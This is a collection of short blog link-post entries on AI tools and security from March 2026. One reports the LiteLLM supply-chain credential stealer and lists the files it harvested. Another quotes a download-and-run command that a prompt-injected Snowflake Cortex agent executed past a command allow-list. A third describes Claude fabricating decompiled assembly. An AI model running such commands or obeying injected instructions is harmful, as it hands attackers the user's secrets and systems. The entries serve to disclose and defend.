| Malicious litellm_init.pth in litellm 1.82.8 — credential stealer |
https://github.com/BerriAI/litellm/issues/24512 |
The LiteLLM v1.82.8 package published to PyPI was compromised with a particularly nasty credential stealer hidden in base64 in a `litellm_init.pth` file, which means installing the package is enough to trigger it even without running `import litellm`.
(1.82.7 had the exploit as well but it was in the `proxy/proxy_server.py` file so the package had to be imported for it to take effect.)
This issue has a very detailed description of what the credential stealer does. There's more information about the timeline of the exploit [over here](https://github.com/BerriAI/litellm/issues/24518).
PyPI has already [quarantined](https://pypi.org/help/#project_in_quarantine) the [litellm package](https://pypi.org/project/litellm/) so the window for compromise was just a few hours, but if you DID install the package it would have hoovered up a bewildering array of secrets, including `~/.ssh/`, `~/.gitconfig`, `~/.git-credentials`, `~/.aws/`, `~/.kube/`, `~/.config/`, `~/.azure/`, `~/.docker/`, `~/.npmrc`, `~/.vault-token`, `~/.netrc`, `~/.lftprc`, `~/.msmtprc`, `~/.my.cnf`, `~/.pgpass`, `~/.mongorc.js`, `~/.bash_history`, `~/.zsh_history`, `~/.sh_history`, `~/.mysql_history`, `~/.psql_history`, `~/.rediscli_history`, `~/.bitcoin/`, `~/.litecoin/`, `~/.dogecoin/`, `~/.zcash/`, `~/.dashcore/`, `~/.ripple/`, `~/.bitmonero/`, `~/.ethereum/`, `~/.cardano/`.
It looks like this supply chain attack started with the [recent exploit](https://www.crowdstrike.com/en-us/blog/from-scanner-to-stealer-inside-the-trivy-action-supply-chain-compromise/) against [Trivy](https://trivy.dev/), ironically a security scanner tool that was used in CI [by LiteLLM](https://github.com/BerriAI/litellm/blob/9343aeefca37aa49a6ea54397d7615adae5c72c9/ci_cd/security_scans.sh#L16). The Trivy exploit likely resulted in stolen PyPI credentials which were then used to directly publish the vulnerable packages. |
2026-03-24 15:07:31+00:00 |
| Turbo Pascal 3.02A, deconstructed |
https://tools.simonwillison.net/turbo-pascal-deconstructed |
In [Things That Turbo Pascal is Smaller Than](https://prog21.dadgum.com/116.html) James Hague lists things (from 2011) that are larger in size than Borland's 1985 Turbo Pascal 3.02 executable - a 39,731 byte file that somehow included a full text editor IDE and Pascal compiler.
This inspired me to track down a copy of that executable (available as freeware since 2000) and see if Claude could interpret the binary and decompile it for me.
It did a great job, so I had it create [this interactive artifact](https://tools.simonwillison.net/turbo-pascal-deconstructed) illustrating the result. Here's the [sequence of prompts](https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e) I used (in regular [claude.ai](https://claude.ai/) chat, not Claude Code):
> Read this https://prog21.dadgum.com/116.html
> Now find a copy of that binary online
> Explore this (*I attached the zip file*)
> Build an artifact - no react - that embeds the full turbo.com binary and displays it in a way that helps understand it - broke into labeled segments for different parts of the application, decompiled to visible source code (I guess assembly?) and with that assembly then reconstructed into readable code with extensive annotations

**Update**: Annoyingly the [Claude share link](https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e) doesn't show the actual code that Claude executed, but here's [the zip file](https://static.simonwillison.net/static/2026/turbo-pascal-analysis.zip) it gave me when I asked to download all of the intermediate files.
I ran Codex CLI with GPT-5.4 xhigh against that zip file to see if it would spot any obvious hallucinations, and it did not. This project is low-enough stakes that this gave me enough confidence to publish the result!
<h4 id="hallucinated-slop">Turns out it's hallucinated slop</h4>
**Update 2**, 24th March 2026: rep_lodsb on Hacker News is someone who actually understands assembler, and they reviewed the annotations and [found them to be hallucinated slop](https://news.ycombinator.com/item?id=47471647#47501692):
> [...] Obviously, there has to be a lot more to even a simple-minded x86 code generator than just a generic "emit opcode byte" and "emit call" routine. In general, what A"I" produced here is not a full disassembly but a collection of short snippets, potentially not even including the really interesting ones. But is it even correct?
>
> EmitByte here is unnecessarily pushing/popping AX, which isn't modified by the few instructions in between at all. No competent assembly language programmer would do this. So maybe against all expectations, Turbo Pascal is just really badly coded? No, it's of course a hallucination: those instructions don't appear in the binary at all! [...]
>
> But searching for e.g. the hex opcode B0 E8 ('mov al,0xe8') is enough to confirm that this code snippet isn't to be found *anywhere*.
>
> There is a lot more suspicious code, including some that couldn't possibly work (like the "ret 1" in the system call dispatcher, which would misalign the stack).
>
> Conclusion: it's slop
Because it's amusing to loop this kind of criticism through a model, I [pasted their feedback into Claude](https://claude.ai/share/a64c94eb-c623-4fd4-b101-e3e7d66c77ca) along with instructions to re-review their the code and it agreed with their assessment:
> The commenter's core charge — that the annotated disassembly is "slop" — is substantiated. The artifact presents a mix of genuine analysis (real hex dumps, some correctly disassembled sections) and wholesale fabrication (invented assembly with plausible-sounding labels and comments for roughly half the binary). The fabricated sections look convincing to a casual reader but don't survive byte-level comparison with the actual binary. |
2026-03-20 23:59:14+00:00 |
| Autoresearching Apple's "LLM in a Flash" to run Qwen 397B locally |
https://twitter.com/danveloper/status/2034353876753592372 |
Here's a fascinating piece of research by Dan Woods, who managed to get a custom version of [Qwen3.5-397B-A17B](https://huggingface.co/Qwen/Qwen3.5-397B-A17B/tree/main) running at 5.5+ tokens/second on a 48GB MacBook Pro M3 Max despite that model taking up 209GB (120GB quantized) on disk.
Qwen3.5-397B-A17B is a Mixture-of-Experts (MoE) model, which means that each token only needs to run against a subset of the overall model weights. These expert weights can be streamed into memory from SSD, saving them from all needing to be held in RAM at the same time.
Dan used techniques described in Apple's 2023 paper [LLM in a flash: Efficient Large Language Model Inference with Limited Memory](https://arxiv.org/abs/2312.11514):
> This paper tackles the challenge of efficiently running LLMs that exceed the available DRAM capacity by storing the model parameters in flash memory, but bringing them on demand to DRAM. Our method involves constructing an inference cost model that takes into account the characteristics of flash memory, guiding us to optimize in two critical areas: reducing the volume of data transferred from flash and reading data in larger, more contiguous chunks.
He fed the paper to Claude Code and used a variant of Andrej Karpathy's [autoresearch pattern](https://simonwillison.net/2026/Mar/13/liquid/) to have Claude run 90 experiments and produce MLX Objective-C and Metal code that ran the model as efficiently as possible.
[danveloper/flash-moe](https://github.com/danveloper/flash-moe) has the resulting code plus [a PDF paper](https://github.com/danveloper/flash-moe/blob/main/paper/flash_moe.pdf) mostly written by Claude Opus 4.6 describing the experiment in full.
The final model has the experts quantized to 2-bit, but the non-expert parts of the model such as the embedding table and routing matrices are kept at their original precision, adding up to 5.5GB which stays resident in memory while the model is running.
Qwen 3.5 usually runs 10 experts per token, but this setup dropped that to 4 while claiming that the biggest quality drop-off occurred at 3.
It's not clear to me how much the quality of the model results are affected. Claude claimed that "Output quality at 2-bit is indistinguishable from 4-bit for these evaluations", but the description of the evaluations it ran is quite thin.
**Update**: Dan's [latest version](https://twitter.com/danveloper/status/2034686509748462022) upgrades to 4-bit quantization of the experts (209GB on disk, 4.36 tokens/second) after finding that the 2-bit version broke tool calling while 4-bit handles that well. |
2026-03-18 23:56:46+00:00 |
| Snowflake Cortex AI Escapes Sandbox and Executes Malware |
https://www.promptarmor.com/resources/snowflake-ai-escapes-sandbox-and-executes-malware |
PromptArmor report on a prompt injection attack chain in Snowflake's [Cortex Agent](https://docs.snowflake.com/en/user-guide/snowflake-cortex/cortex-agents), now fixed.
The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README.
The attack caused the agent to execute this code:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
Cortex listed `cat` commands as safe to run without human approval, without protecting against this form of process substitution that can occur in the body of the command.
I've seen allow-lists against command patterns like this in a bunch of different agent tools and I don't trust them at all - they feel inherently unreliable to me.
I'd rather treat agent commands as if they could do anything that process itself is allowed to do, hence my interest in deterministic sandboxes that operate outside of the layer of the agent itself. |
2026-03-18 17:43:49+00:00 |
| Introducing Mistral Small 4 |
https://mistral.ai/news/mistral-small-4 |
Big new release from Mistral today (despite the name) - a new Apache 2 licensed 119B parameter (Mixture-of-Experts, 6B active) model which they describe like this:
> Mistral Small 4 is the first Mistral model to unify the capabilities of our flagship models, Magistral for reasoning, Pixtral for multimodal, and Devstral for agentic coding, into a single, versatile model.
It supports `reasoning_effort="none"` or `reasoning_effort="high"`, with the latter providing "equivalent verbosity to previous Magistral models".
The new model is [242GB on Hugging Face](https://huggingface.co/mistralai/Mistral-Small-4-119B-2603/tree/main).
I [tried it out](https://gist.github.com/simonw/3dec228577559f15f26204a3cc550583) via the Mistral API using [llm-mistral](https://github.com/simonw/llm-mistral):
llm install llm-mistral
llm mistral refresh
llm -m mistral/mistral-small-2603 "Generate an SVG of a pelican riding a bicycle"

I couldn't find a way to set the reasoning effort in their [API documentation](https://docs.mistral.ai/api/endpoint/chat#operation-chat_completion_v1_chat_completions_post), so hopefully that's a feature which will land soon.
<em>**Update 23rd March**: Here's new documentation for the [reasoning_effort parameter](https://docs.mistral.ai/capabilities/reasoning/adjustable).</em>
Also from Mistral today and fitting their -stral naming convention is [Leanstral](https://mistral.ai/news/leanstral), an open weight model that is specifically tuned to help output the [Lean 4](https://lean-lang.org/) formally verifiable coding language. I haven't explored Lean at all so I have no way to credibly evaluate this, but it's interesting to see them target one specific language in this way. |
2026-03-16 23:41:17+00:00 |
| Use subagents and custom agents in Codex |
https://developers.openai.com/codex/subagents |
Subagents were announced in general availability today for OpenAI Codex, after several weeks of preview behind a feature flag.
They're very similar to the Claude Code implementation, with default subagents for "explorer", "worker" and "default". It's unclear to me what the difference between "worker" and "default" is but based on their CSV example I think "worker" is intended for running large numbers of small tasks in parallel.
Codex also lets you define custom agents as TOML files in `~/.codex/agents/`. These can have custom instructions and be assigned to use specific models - including `gpt-5.3-codex-spark` if you want [some raw speed](https://simonwillison.net/2026/Feb/12/codex-spark/). They can then be referenced by name, as demonstrated by this example prompt from the documentation:
> `Investigate why the settings modal fails to save. Have browser_debugger reproduce it, code_mapper trace the responsible code path, and ui_fixer implement the smallest fix once the failure mode is clear.`
The subagents pattern is widely supported in coding agents now. Here's documentation across a number of different platforms:
- [OpenAI Codex subagents](https://developers.openai.com/codex/subagents/)
- [Claude Code subagents](https://code.claude.com/docs/en/sub-agents)
- [Gemini CLI subagents](https://geminicli.com/docs/core/subagents/) (experimental)
- [Mistral Vibe subagents](https://docs.mistral.ai/mistral-vibe/agents-skills#agent-selection)
- [OpenCode agents](https://opencode.ai/docs/agents/)
- [Subagents in Visual Studio Code](https://code.visualstudio.com/docs/copilot/agents/subagents)
- [Cursor Subagents](https://cursor.com/docs/subagents)
**Update**: I added [a chapter on Subagents](https://simonwillison.net/guides/agentic-engineering-patterns/subagents/) to my Agentic Engineering Patterns guide. |
2026-03-16 23:03:56+00:00 |
| Coding agents for data analysis |
https://simonw.github.io/nicar-2026-coding-agents/ |
Here's the handout I prepared for my NICAR 2026 workshop "Coding agents for data analysis" - a three hour session aimed at data journalists demonstrating ways that tools like Claude Code and OpenAI Codex can be used to explore, analyze and clean data.
Here's the table of contents:
> - [Coding agents](https://simonw.github.io/nicar-2026-coding-agents/coding-agents.html)
> - [Warmup: ChatGPT and Claude](https://simonw.github.io/nicar-2026-coding-agents/warmup.html)
> - [Setup Claude Code and Codex](https://simonw.github.io/nicar-2026-coding-agents/setup.html)
> - [Asking questions against a database](https://simonw.github.io/nicar-2026-coding-agents/asking-questions.html)
> - [Exploring data with agents](https://simonw.github.io/nicar-2026-coding-agents/exploring-data.html)
> - [Cleaning data: decoding neighborhood codes](https://simonw.github.io/nicar-2026-coding-agents/cleaning-trees.html)
> - [Creating visualizations with agents](https://simonw.github.io/nicar-2026-coding-agents/visualizations.html)
> - [Scraping data with agents](https://simonw.github.io/nicar-2026-coding-agents/scraping.html)
I ran the workshop using GitHub Codespaces and OpenAI Codex, since it was easy (and inexpensive) to distribute a budget-restricted API key for Codex that attendees could use during the class. Participants ended up burning $23 of Codex tokens.
The exercises all used Python and SQLite and some of them used Datasette.
One highlight of the workshop was when we started [running Datasette](https://simonw.github.io/nicar-2026-coding-agents/visualizations.html#javascript-visualizations) such that it served static content from a `viz/` folder, then had Claude Code start vibe coding new interactive visualizations directly in that folder. Here's a heat map it created for my trees database using Leaflet and [Leaflet.heat](https://github.com/Leaflet/Leaflet.heat), [source code here](https://gist.github.com/simonw/985ae2a6a3cd3df3fd375eb58dabea0f).

I designed the handout to also be useful for people who weren't able to attend the session in person. As is usually the case, material aimed at data journalists is equally applicable to anyone else with data to explore. |
2026-03-16 20:12:32+00:00 |
| 1M context is now generally available for Opus 4.6 and Sonnet 4.6 |
https://claude.com/blog/1m-context-ga |
Here's what surprised me:
> Standard pricing now applies across the full 1M window for both models, with no long-context premium.
OpenAI and Gemini both [charge more](https://www.llm-prices.com/#sel=gemini-3-1-pro-preview-200k%2Cgpt-5.4-272k%2Cgemini-3-1-pro-preview%2Cgpt-5.4) for prompts where the token count goes above a certain point - 200,000 for Gemini 3.1 Pro and 272,000 for GPT-5.4. |
2026-03-13 18:29:13+00:00 |
| Shopify/liquid: Performance: 53% faster parse+render, 61% fewer allocations |
https://github.com/Shopify/liquid/pull/2056 |
PR from Shopify CEO Tobias Lütke against Liquid, Shopify's open source Ruby template engine that was somewhat inspired by Django when Tobi first created it [back in 2005](https://simonwillison.net/2005/Nov/6/liquid/).
Tobi found dozens of new performance micro-optimizations using a variant of [autoresearch](https://github.com/karpathy/autoresearch), Andrej Karpathy's new system for having a coding agent run hundreds of semi-autonomous experiments to find new effective techniques for training [nanochat](https://github.com/karpathy/nanochat).
Tobi's implementation started two days ago with this [autoresearch.md](https://github.com/Shopify/liquid/blob/2543fdc1a101f555db208fb0deeb2e3bf1ae9e36/auto/autoresearch.md) prompt file and an [autoresearch.sh](https://github.com/Shopify/liquid/blob/2543fdc1a101f555db208fb0deeb2e3bf1ae9e36/auto/autoresearch.sh) script for the agent to run to execute the test suite and report on benchmark scores.
The PR now lists [93 commits](https://github.com/Shopify/liquid/pull/2056/commits) from around 120 automated experiments. The PR description lists what worked in detail - some examples:
> - **Replaced StringScanner tokenizer with `String#byteindex`.** Single-byte `byteindex` searching is ~40% faster than regex-based `skip_until`. This alone reduced parse time by ~12%.
> - **Pure-byte `parse_tag_token`.** Eliminated the costly `StringScanner#string=` reset that was called for every `{% %}` token (878 times). Manual byte scanning for tag name + markup extraction is faster than resetting and re-scanning via StringScanner. [...]
> - **Cached small integer `to_s`.** Pre-computed frozen strings for 0-999 avoid 267 `Integer#to_s` allocations per render.
This all added up to a 53% improvement on benchmarks - truly impressive for a codebase that's been tweaked by hundreds of contributors over 20 years.
I think this illustrates a number of interesting ideas:
- Having a robust test suite - in this case 974 unit tests - is a *massive unlock* for working with coding agents. This kind of research effort would not be possible without first having a tried and tested suite of tests.
- The autoresearch pattern - where an agent brainstorms a multitude of potential improvements and then experiments with them one at a time - is really effective.
- If you provide an agent with a benchmarking script "make it faster" becomes an actionable goal.
- CEOs can code again! Tobi has always been more hands-on than most, but this is a much more significant contribution than anyone would expect from the leader of a company with 7,500+ employees. I've seen this pattern play out a lot over the past few months: coding agents make it feasible for people in high-interruption roles to productively work with code again.
Here's Tobi's [GitHub contribution graph](https://github.com/tobi) for the past year, showing a significant uptick following that [November 2025 inflection point](https://simonwillison.net/tags/november-2025-inflection/) when coding agents got really good.

He used [Pi](https://github.com/badlogic/pi-mono) as the coding agent and released a new [pi-autoresearch](https://github.com/davebcn87/pi-autoresearch) plugin in collaboration with David Cortés, which maintains state in an `autoresearch.jsonl` file [like this one](https://github.com/Shopify/liquid/blob/3182b7c1b3758b0f5fe2d0fcc71a48bbcb11c946/autoresearch.jsonl). |
2026-03-13 03:44:34+00:00 |
| MALUS - Clean Room as a Service |
https://malus.sh/ |
Brutal satire on the whole vibe-porting license washing thing ([previously](https://simonwillison.net/2026/Mar/5/chardet/)):
> Finally, liberation from open source license obligations.
>
> Our proprietary AI robots independently recreate any open source project from scratch. The result? **Legally distinct code** with corporate-friendly licensing. No attribution. No copyleft. No problems..
I admit it took me a moment to confirm that this was a joke. Just too on-the-nose. |
2026-03-12 20:08:55+00:00 |